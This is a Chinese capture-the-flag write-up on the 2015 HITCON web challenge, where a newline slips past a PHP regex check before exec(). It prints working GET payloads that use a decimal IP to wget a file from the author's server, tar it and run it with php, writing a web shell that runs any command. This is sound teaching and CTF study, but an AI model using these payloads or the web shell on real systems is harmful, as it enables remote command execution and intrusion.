【另类姿势RCE】一个由正则引发的命令执行

本文最后更新于:2022年2月24日下午5点53分

本文首发于合天网安实验室

首发链接:https://mp.weixin.qq.com/s/SE2GcPBqh1ghQuXk-pyiDQ

前言

对于Web方向的选手来说,拥有一台vps可以快速解决一些RCE问题,本篇文章所演示的是2015年HITCON的一道web题,虽然时隔有些久,但是这题所利用的trick以及RCE的思路,仍然值得我们去学习。

初步审计

题目代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
highlight_file(__FILE__);

$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
if ( !file_exists($dir) )
mkdir($dir);
chdir($dir);

$args = $_GET['args'];
for ( $i=0; $i<count($args); $i++ ){
if ( !preg_match('/^\w+$/', $args[$i]) )
exit();
}
exec("/bin/orange " . implode(" ", $args));
?>

题目代码比较短,一共就15行代码,但实际上最关键的代码就只有两行,如下:

1
2
if ( !preg_match('/^\w+$/', $args[$i]) )
exec("/bin/orange " . implode(" ", $args));

一个是正则匹配,一个是exec的命令执行

首先先看正则部分/^\w+$/,这一部分要求传入的args参数必须以字母数字下划线开头,除此之外,在最后还有一个美元符号$,需要明确的是:$符号在PCRE中是会匹配\n以及\r前的位置的,结合后面exec命令执行的部分,也就是说,我们可以使用换行符%0a绕过执行其他命令。

但是如果本题在正则表达式后加一个D修饰符,那么就无法使用%0a绕过,具体测试样例如下,这里就不过多阐述了,因为题目中没有这个修饰符。

1
2
echo preg_match("/^\w+$/", "abc".chr(10));//1
echo preg_match("/^\w+$/D", "abc".chr(10));//0

其次再粗略看一下命令执行的部分,这里命令执行的部分使用exec,单单使用一个exec是无法将命令执行的结果回显出来,因此在后续做题就可能会产生这么几种思路:数据外带、写入shell等等

数据外带

首先分析一下数据外带,多数情况下想要尝试数据外带都需要使用一些特殊的字符,例如使用反引号外带至dnslog,不过本题正则不允许args传入,因此数据外带这个方法行不通

写入shell

想要使用写入shell方法完成本题,还是有两种方式,一种方式就是使用echo 'xxx' > xx.php,然而这题正则过滤了这些字符,因此可以使用另一种方法,就是将下载远程服务器上的文件,通过一些操作进行RCE

详解RCE

本题官方解所使用的思路就是:下载远程服务器上的文件,通过一些操作进行RCE,具体是哪些操作下面会说到。

首先我们现在本地服务器上测试,此时新建一个php文件,命名为1.php,内容如下:

1
2
3
4
<?php
echo 3 * 4;
echo "\n";
?>

然后将1.php放入一个文件夹a

image-20220214202124039

这个时候我们将文件夹a利用tar打包,注意是打包,不是压缩

1
2
tar cf b a
将文件夹a打包,并且生成b

打包之后结果如下:

image-20220214202318353

此时我们直接使用php命令去执行这个b

image-20220214202344964

看一下最后的12,就是前面1.php的执行结果3 * 4 = 12

那么为什么可以直接执行b这个文件呢?

其实我们可以直接使用cat查看b中的文件

image-20220214202525649

可以看到,b文件中存在之前写入的1.php的代码

这个时候我们总结一下这个方法,全程使用的命令对于正则/^\w+$/都是合法的,并且1.php中的内容可控,因此可以通过这个方法写入shell

因此,对于解题来说,解题流程如下:

首先在vps中新建一个index.html,文件内容如下:

1
2
3
4
5
6
7
8
<?php
file_put_contents('shell.php', '
<?php
header("Content-Type: text/plain");
print shell_exec($_GET["cmd"]);
?>
');
?>

然后在vps中启动http服务

1
python3 -m http.server 80

由于ip都是6.6.6.6的形式,带.,不符合正则,因此可以使用十进制ip绕过

1
2
3
4
<?php
echo ip2long("6.6.6.6");
?>
//101058054

然后先新建一个upload目录,对应上面测试的a

1
?args[]=l%0a&args[]=mkdir&args[]=upload

然后进入upload目录,利用wget下载vps上的index.html

1
2
?args[]=l%0a&args[]=cd&args[]=upload%0a&args[]=wget&args[]=101058054
//注意:最后一个args为vps十进制ip值

upload目录打包,打包后的名称为b

1
2
?args[]=l%0a&args[]=tar&args[]=cvf&args[]=b&args[]=upload
//将upload目录打包为b

在执行b目录,写入shell

1
2
?args[]=l%0a&args[]=php&args[]=b
//执行b,写入shell

这题本质上是利用了tar打包的特性,将下载下来的index.html打包,然后利用php执行

不过这只是官方解,除此之外,在2015年比赛的时候,还有一些队伍使用http302重定向到ftp中,将恶意文件下载到靶机中getshell。

由于Python自带的http.server默认将index.html作为首页,并且无法修改默认首页

但是,还有一种方法就是自建一个web服务器,不使用php解析,且访问80端口的默认文档为shell.php,然后再利用wget下载php文件进行getshell。

总之,方法总比困难多。

参考文章